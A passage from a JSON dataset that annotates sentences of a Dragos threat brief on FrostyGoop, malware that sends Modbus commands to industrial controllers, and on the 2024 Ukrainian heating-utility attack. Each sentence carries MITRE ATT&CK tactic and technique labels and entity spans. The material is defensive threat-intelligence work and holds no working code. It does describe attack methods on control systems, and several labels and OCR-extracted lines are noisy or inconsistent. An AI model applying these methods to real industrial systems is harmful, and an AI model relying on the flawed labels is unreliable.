"techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s37-198a37", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 37, "context_before": "FrostyGoop binaries are compiled for Windows systems.", "sentence_text": "The malware can read and write to the device holding registers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s38-6329da", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 38, "context_before": "The malware can read and write to the device holding registers.", "sentence_text": "At the time of discovery, Dragos assessed with low confidence that the FrostyGoop ICS malware discovered was used for testing purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s39-1eb33d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 39, "context_before": "At the time of discovery, Dragos assessed with low confidence that the FrostyGoop ICS malware discovered was used for testing purposes.", "sentence_text": "Dragos discovered an associated configuration file containing multiple Modbus commands to read data from a target ICS device and an IP address belonging to an ENCO control device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s40-2cc513", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 40, "context_before": "Dragos discovered an associated configuration file containing multiple Modbus commands to read data from a target ICS device and an IP address belonging to an ENCO control device.", "sentence_text": "Dragos assessed with moderate confidence that FrostyGoop can impact other devices communicating over Modbus TCP; the malware’s functionality is not specific to ENCO control devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s41-690295", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 41, "context_before": "Dragos assessed with moderate confidence that FrostyGoop can impact other devices communicating over Modbus TCP; the malware’s functionality is not specific to ENCO control devices.", "sentence_text": "Analysis of FrostyGoop files is ongoing for Dragos WorldView Threat Intelligence subscribers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s42-0b3b2d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 42, "context_before": "Analysis of FrostyGoop files is ongoing for Dragos WorldView Threat Intelligence subscribers.", "sentence_text": "What Is the Modbus Protocol?\nModbus is a client/server communication protocol initially designed for Modicon programmable logic controllers in 1979, but it is now widely used by other devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s43-6b6788", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 43, "context_before": "What Is the Modbus Protocol?\nModbus is a client/server communication protocol initially designed for Modicon programmable logic controllers in 1979, but it is now widely used by other devices.", "sentence_text": "The Modbus protocol defines a message structure that controllers recognize and use, regardless of the type of networks over which they communicate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s44-b32d3b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 44, "context_before": "The Modbus protocol defines a message structure that controllers recognize and use, regardless of the type of networks over which they communicate.", "sentence_text": "This protocol establishes a standard format for the layout and contents of message fields.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p4-s45-36f47d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 4, "sentence_id": 45, "context_before": "This protocol establishes a standard format for the layout and contents of message fields.", "sentence_text": "1 Modbus Protocol Reference – Control Solutions Minnesota Page | 2 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s46-fb6873", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 46, "context_before": "1 Modbus Protocol Reference – Control Solutions Minnesota Page | 2 FrostyGoop Intel Brief", "sentence_text": "The controller will create and transmit the reply message if a response is needed using the Modbus protocol.2 FrostyGoop ICS Malware Capabilities •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s47-a02953", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 47, "context_before": "The controller will create and transmit the reply message if a response is needed using the Modbus protocol.2 FrostyGoop ICS Malware Capabilities •", "sentence_text": "Accepts optional command line execution arguments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s48-7d0be3", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 48, "context_before": "Accepts optional command line execution arguments.", "sentence_text": "• Uses separate configuration files to specify target IP addresses and Modbus commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s49-731e7f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 49, "context_before": "• Uses separate configuration files to specify target IP addresses and Modbus commands.", "sentence_text": "• Communicates with ICS devices via Modbus TCP protocol.\n• Sends Modbus commands to read or modify data on ICS devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s50-f04908", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 50, "context_before": "• Communicates with ICS devices via Modbus TCP protocol.\n• Sends Modbus commands to read or modify data on ICS devices.", "sentence_text": "• Logs output to a console or JSON file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s51-a14fd6", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 51, "context_before": "• Logs output to a console or JSON file.", "sentence_text": "Optional Command Line Execution Arguments FrostyGoop checks if the executable is running with any required command line arguments.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "FrostyGoop inspects command-line arguments at runtime.", "entities": [ { "text": "FrostyGoop", "start": 42, "end": 52, "label": "MalwareTool" } ] }, { "uid": "mitre-88_mitre_report-p5-s52-e500a3", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 52, "context_before": "Optional Command Line Execution Arguments FrostyGoop checks if the executable is running with any required command line arguments.", "sentence_text": "The binaries exit execution if no command line arguments are provided.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s53-f065a7", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 53, "context_before": "The binaries exit execution if no command line arguments are provided.", "sentence_text": "The specific arguments vary by sample, but functionality remains the same.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s54-9de44c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 54, "context_before": "The specific arguments vary by sample, but functionality remains the same.", "sentence_text": "Information required to initiate a TCP connection and send Modbus commands to a victim ICS device can be specified as command-line arguments or contained within a separate JSON configuration file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s55-157baf", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 55, "context_before": "Information required to initiate a TCP connection and send Modbus commands to a victim ICS device can be specified as command-line arguments or contained within a separate JSON configuration file.", "sentence_text": "• Specify a file name to save logging output Configuration File FrostyGoop accepts a JSON-formatted configuration file containing information used to execute Modbus commands on a target device.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0886", "name": "" } ], "procedure": "The malware loads a JSON config file that contains parameters for executing Modbus commands on the ICS device.", "entities": [ { "text": "FrostyGoop ", "start": 64, "end": 75, "label": "MalwareTool" } ] }, { "uid": "mitre-88_mitre_report-p5-s56-e9124a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 56, "context_before": "• Specify a file name to save logging output Configuration File FrostyGoop accepts a JSON-formatted configuration file containing information used to execute Modbus commands on a target device.", "sentence_text": "Dragos discovered a sample of the configuration file named ‘task_test.json.’", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.006", "name": "Vulnerabilities" } ], "procedure": "Dragos found a configuration file named task_test.json during analysis.", "entities": [ { "text": "task_test.json", "start": 60, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p5-s57-52d4df", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 57, "context_before": "Dragos discovered a sample of the configuration file named ‘task_test.json.’", "sentence_text": "The IP address in the sample configuration file belongs to an ENCO control device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p5-s58-0abcbd", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 5, "sentence_id": 58, "context_before": "The IP address in the sample configuration file belongs to an ENCO control device.", "sentence_text": "ENCO control devices are typically used “for process control in 2 Modicon Mobus Protocol Reference Guide - Modbus Page | 3 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p6-s59-8359b5", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 59, "context_before": "ENCO control devices are typically used “for process control in 2 Modicon Mobus Protocol Reference Guide - Modbus Page | 3 FrostyGoop Intel Brief", "sentence_text": "The other fields in the configuration file are described below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p6-s60-db5e3f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 60, "context_before": "The other fields in the configuration file are described below.", "sentence_text": "Address Modbus register address Count Quantity of registers to read or write Value Integer used to modify the Holding Register (used for Modbus ‘write holding register’ commands)\nCONFIGURATION FIELDS\nModbus TCP Network Traffic FrostyGoop initiates communication with the target IP address over Modbus TCP port 502.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0886", "name": "" } ], "procedure": "The malware connects to the target device using Modbus TCP on port 502.", "entities": [ { "text": "FrostyGoop", "start": 227, "end": 237, "label": "MalwareTool" }, { "text": " Modbus TCP port 502", "start": 293, "end": 313, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p6-s61-67b96a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 61, "context_before": "Address Modbus register address Count Quantity of registers to read or write Value Integer used to modify the Holding Register (used for Modbus ‘write holding register’ commands)\nCONFIGURATION FIELDS\nModbus TCP Network Traffic FrostyGoop initiates communication with the target IP address over Modbus TCP port 502.", "sentence_text": "The IP address can be specified either by using an argument during malware execution or by including it in the configuration JSON file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p6-s62-9bcb15", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 62, "context_before": "The IP address can be specified either by using an argument during malware execution or by including it in the configuration JSON file.", "sentence_text": "Once a connection is established, FrostyGoop sends Modbus commands to the device.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0886", "name": "" } ], "procedure": "FrostyGoop transmits Modbus commands after establishing a connection.", "entities": [ { "text": " FrostyGoop", "start": 33, "end": 44, "label": "MalwareTool" }, { "text": "sends Modbus commands ", "start": 45, "end": 67, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p6-s63-f00878", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 63, "context_before": "Once a connection is established, FrostyGoop sends Modbus commands to the device.", "sentence_text": "After FrostyGoop sends commands and receives the target device's responses, the binaries close the connection and exit execution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "FrostyGoop exchanges Modbus messages, then terminates the connection and stops running.", "entities": [ { "text": "FrostyGoop", "start": 6, "end": 16, "label": "MalwareTool" }, { "text": " sends commands", "start": 16, "end": 31, "label": "Action" }, { "text": "receives the target device's responses", "start": 36, "end": 74, "label": "Action" }, { "text": "close the connection", "start": 89, "end": 109, "label": "Action" }, { "text": "exit execution", "start": 114, "end": 128, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p6-s64-4ab85c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 64, "context_before": "After FrostyGoop sends commands and receives the target device's responses, the binaries close the connection and exit execution.", "sentence_text": "FrostyGoop binaries use a Go Modbus library retrieved from a publicly available Github repository.4 FrostyGoop implements three Modbus commands:\n• Command Code 3 ‘Read Holding Registers’ which is used to read the value currently in a Modbus holding register (or contiguous block of holding registers) 5 • Command Code 6 ‘Write Single Register’ which is used to write a value to a holding register6 • Command Code 16 ‘Write Multiple Holding Registers’ which is used to write a value to a block of contiguous registers7", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0886", "name": "" } ], "procedure": "FrostyGoop loads a public Go Modbus library and uses it to execute read/write Modbus register commands.", "entities": [ { "text": "FrostyGoop binaries", "start": 0, "end": 19, "label": "MalwareTool" }, { "text": " Go Modbus library", "start": 25, "end": 43, "label": "MalwareTool" }, { "text": "publicly available Github repository", "start": 61, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "use a Go Modbus library", "start": 20, "end": 43, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p6-s65-ba980a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 65, "context_before": "FrostyGoop binaries use a Go Modbus library retrieved from a publicly available Github repository.4 FrostyGoop implements three Modbus commands:\n• Command Code 3 ‘Read Holding Registers’ which is used to read the value currently in a Modbus holding register (or contiguous block of holding registers) 5 • Command Code 6 ‘Write Single Register’ which is used to write a value to a holding register6 • Command Code 16 ‘Write Multiple Holding Registers’ which is used to write a value to a block of contiguous registers7", "sentence_text": "The figure below displays an example of Modbus TCP network traffic between FrostyGoop and a target device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p6-s66-79a180", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 6, "sentence_id": 66, "context_before": "The figure below displays an example of Modbus TCP network traffic between FrostyGoop and a target device.", "sentence_text": "3 ENCO Control Configuration Instruction – Axis Industries 4 Modbus Go Library – Github.com 5 Modbus Application Protocol Specification – modbus.com 6 Modbus Application Protocol Specification – modbus.com 7 Modbus Application Protocol Specification – modbus.com Page | 4 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s67-526021", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 67, "context_before": "3 ENCO Control Configuration Instruction – Axis Industries 4 Modbus Go Library – Github.com 5 Modbus Application Protocol Specification – modbus.com 6 Modbus Application Protocol Specification – modbus.com 7 Modbus Application Protocol Specification – modbus.com Page | 4 FrostyGoop Intel Brief", "sentence_text": "1468 15•256 SACKPEAlt-1 3: Read Holding Registers 1· Lk'lit: 254 Fune: 3: Read Holdin R \"sters Seq 8 l:ln 1192 Len 8 IISS lA68 IS 256 SM:K_PERM-1 ACK S!!l•I Ack•I 1:ln•&5535 L111•8.llSS•l\"68 15•256 SACKPEAlt-1 S t.ck ■l Win ■131328 Len ■0", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s68-840e7e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 68, "context_before": "1468 15•256 SACKPEAlt-1 3: Read Holding Registers 1· Lk'lit: 254 Fune: 3: Read Holdin R \"sters Seq 8 l:ln 1192 Len 8 IISS lA68 IS 256 SM:K_PERM-1 ACK S!!l•I Ack•I 1:ln•&5535 L111•8.llSS•l\"68 15•256 SACKPEAlt-1 S t.ck ■l Win ■131328 Len ■0", "sentence_text": "Query: Trans: 1; l.k'lit: 254, Fune: 6: Urite Single Register 66 Res onse: Trans: 1· lrlit: 254 Fune: 6: Urite Sin ster '6 49377 + 512 [SYN] Seq•I l:ln•l192 Len•I", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s69-cecab5", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 69, "context_before": "Query: Trans: 1; l.k'lit: 254, Fune: 6: Urite Single Register 66 Res onse: Trans: 1· lrlit: 254 Fune: 6: Urite Sin ster '6 49377 + 512 [SYN] Seq•I l:ln•l192 Len•I", "sentence_text": "S•lA68 15•256 K_ 1 '6 512 + 49377 (SYN, ACK]Seq•I Ack•1 lin•&5535 Len•I 5•1\"68 15•256 SACK_PEAlt-1 TCP 54 49377 ~ 502 (ACK] S =l \"-Ck=l Win=l31328 L =0 rans:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s70-a124f1", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 70, "context_before": "S•lA68 15•256 K_ 1 '6 512 + 49377 (SYN, ACK]Seq•I Ack•1 lin•&5535 Len•I 5•1\"68 15•256 SACK_PEAlt-1 TCP 54 49377 ~ 502 (ACK] S =l \"-Ck=l Win=l31328 L =0 rans:", "sentence_text": "Trans:\nEXAMPLE OF FROSTYGOOP NETWORK TRAFFIC Logging Capabilities", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s71-97903a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 71, "context_before": "Trans:\nEXAMPLE OF FROSTYGOOP NETWORK TRAFFIC Logging Capabilities", "sentence_text": "The FrostyGoop binaries log output from the Modbus TCP communications with the target IP address to a Windows console and a JSON file.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "logic Modbus communication output to console and JSOn file", "entities": [ { "text": "FrostyGoop ", "start": 4, "end": 15, "label": "ThreatActor" } ] }, { "uid": "mitre-88_mitre_report-p7-s72-84eb99", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 72, "context_before": "The FrostyGoop binaries log output from the Modbus TCP communications with the target IP address to a Windows console and a JSON file.", "sentence_text": "FrostyGoop opens a console window upon execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "opens a console window when run", "entities": [ { "text": "FrostyGoop", "start": 0, "end": 10, "label": "ThreatActor" } ] }, { "uid": "mitre-88_mitre_report-p7-s73-288453", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 73, "context_before": "FrostyGoop opens a console window upon execution.", "sentence_text": "If the argument for logging is specified when executing the binary, then the output is logged to a JSON file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s74-502be9", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 74, "context_before": "If the argument for logging is specified when executing the binary, then the output is logged to a JSON file.", "sentence_text": "Below is an example of output to the console window during Modbus TCP communications with a device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s75-f6a41b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 75, "context_before": "Below is an example of output to the console window during Modbus TCP communications with a device.", "sentence_text": "FrostyGoop logs a minus sign if the response from the device contains an exception.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "logs a specific character for Modbus exceptions", "entities": [ { "text": "FrostyGoop", "start": 0, "end": 10, "label": "MalwareTool" } ] }, { "uid": "mitre-88_mitre_report-p7-s76-4693ca", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 76, "context_before": "FrostyGoop logs a minus sign if the response from the device contains an exception.", "sentence_text": "An example of when a device would send an exception to the malware would be if the holding register does not exist.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s77-cc5445", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 77, "context_before": "An example of when a device would send an exception to the malware would be if the holding register does not exist.", "sentence_text": "[runtime.yoexit:asm_amd64.s:1598][1NFO] (1/1)\nstart\n[main.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s78-edb825", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 78, "context_before": "[runtime.yoexit:asm_amd64.s:1598][1NFO] (1/1)\nstart\n[main.", "sentence_text": "TaskList.executeCommand:main.yo:370][1NFO]\n(1/1) address: 53370 count: 5 + : 0s", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s80-53165b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 80, "context_before": "[main.", "sentence_text": "TaskList.executeCommand:main.yo:370][1NFO]\n(1/1) address: 53760 count: 10 + : 15.625ms", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s82-bb2268", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 82, "context_before": "[main.", "sentence_text": "TaskList.executeCommand:main.yo:370][1NFO]\n(1/1) address: 53882 value: 0 + : 0s", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s84-856a0d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 84, "context_before": "[main.", "sentence_text": "TaskList.executeCommand:main.yo:370][1NFO]\n(1/1) address: 54272 count: 10 + : 15.625ms", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s85-41f4c4", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 85, "context_before": "TaskList.executeCommand:main.yo:370][1NFO]\n(1/1) address: 54272 count: 10 + : 15.625ms", "sentence_text": "[runtime.main:proc.yo:250][1NFO] Time delta :", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p7-s86-104786", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 7, "sentence_id": 86, "context_before": "[runtime.main:proc.yo:250][1NFO] Time delta :", "sentence_text": "2m3.5390625s SAMPLE FROSTYGOOP CONSOLE LOG Page | 5 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p8-s87-9d7722", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 87, "context_before": "2m3.5390625s SAMPLE FROSTYGOOP CONSOLE LOG Page | 5 FrostyGoop Intel Brief", "sentence_text": "2024 OT Cyber Attack Impacting Communities in Ukraine The Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), shared details with Dragos of a cyber attack that took place in January 2024.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "cyber attack impacting OT in Ukraine", "entities": [ { "text": "2024 OT Cyber Attack Impacting Communities", "start": 0, "end": 42, "label": "Action" }, { "text": "cyber attack", "start": 198, "end": 210, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p8-s88-ca2204", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 88, "context_before": "2024 OT Cyber Attack Impacting Communities in Ukraine The Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), shared details with Dragos of a cyber attack that took place in January 2024.", "sentence_text": "Adversaries conducted a disruption attack against a municipal district energy company in Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "conduct disruption attack against energy company", "entities": [ { "text": "Adversaries", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "conducted a disruption attack", "start": 12, "end": 41, "label": "Action" }, { "text": "municipal district energy company", "start": 52, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p8-s89-597a1e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 89, "context_before": "Adversaries conducted a disruption attack against a municipal district energy company in Ukraine.", "sentence_text": "Remediation of the incident took almost two days, during which time the civilian population had to endure sub-zero temperatures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p8-s90-59fe87", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 90, "context_before": "Remediation of the incident took almost two days, during which time the civilian population had to endure sub-zero temperatures.", "sentence_text": "During the attack investigation, a discovery was made that adversaries possibly gained access to the victim network months earlier by exploiting an undetermined vulnerability in an externally facing router.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit vulnerability in external router for access", "entities": [ { "text": "adversaries", "start": 59, "end": 70, "label": "ThreatActor" }, { "text": "gained access to the victim network", "start": 80, "end": 115, "label": "Action" }, { "text": "exploiting an undetermined vulnerability", "start": 134, "end": 174, "label": "Action" }, { "text": "externally facing router", "start": 181, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p8-s91-59640a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 91, "context_before": "During the attack investigation, a discovery was made that adversaries possibly gained access to the victim network months earlier by exploiting an undetermined vulnerability in an externally facing router.", "sentence_text": "Subsequently, the adversaries deployed a webshell with tunnel capabilities similar to ReGeorg8, which was accessed predominantly via Tor IP addresses.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "deployed a webshell with tunnel capabilities accessed via Tor", "entities": [ { "text": "adversaries", "start": 18, "end": 29, "label": "ThreatActor" }, { "text": "deployed a webshell with tunnel capabilities", "start": 30, "end": 74, "label": "Action" }, { "text": "Tor IP addresses", "start": 133, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "accessed predominantly", "start": 106, "end": 128, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p8-s92-cfb38e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 92, "context_before": "Subsequently, the adversaries deployed a webshell with tunnel capabilities similar to ReGeorg8, which was accessed predominantly via Tor IP addresses.", "sentence_text": "The investigation revealed that the adversaries retrieved the contents of the Security Account Manager (SAM) registry hive, obtaining user credentials from the system.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.002", "name": "Security Account Manager" } ], "procedure": "retrieve SAM registry hive for credentials", "entities": [ { "text": "adversaries", "start": 36, "end": 47, "label": "ThreatActor" }, { "text": "Security Account Manager (SAM) registry hive", "start": 78, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "retrieved", "start": 48, "end": 57, "label": "Action" }, { "text": "obtaining user credentials", "start": 124, "end": 150, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p8-s93-2fe679", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 93, "context_before": "The investigation revealed that the adversaries retrieved the contents of the Security Account Manager (SAM) registry hive, obtaining user credentials from the system.", "sentence_text": "In January 2024, adversaries initiated L2TP (Layer Two Tunnelling Protocol) connections to Moscow-based IP addresses.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "initiate L2TP connections to Moscow IPs", "entities": [ { "text": "adversaries", "start": 17, "end": 28, "label": "ThreatActor" }, { "text": "L2TP (Layer Two Tunnelling Protocol)", "start": 39, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "Moscow-based IP addresses", "start": 91, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "initiated", "start": 29, "end": 38, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p8-s94-b26dee", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 94, "context_before": "In January 2024, adversaries initiated L2TP (Layer Two Tunnelling Protocol) connections to Moscow-based IP addresses.", "sentence_text": "A forensic examination during the investigation showed that the adversaries sent Modbus commands directly to the district heating system controllers from adversary hosts, facilitated by hardcoded network routes.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T0861", "name": "Modify Controller Tasking" }, { "id": "T0863", "name": "Remote System Discovery" } ], "procedure": "The adversaries issued Modbus commands directly from compromised hosts to district heating system controllers using hardcoded network routes.", "entities": [ { "text": "adversaries", "start": 64, "end": 75, "label": "ThreatActor" }, { "text": "sent Modbus commands", "start": 76, "end": 96, "label": "Action" }, { "text": "district heating system controllers", "start": 113, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "adversary hosts", "start": 154, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "hardcoded network routes", 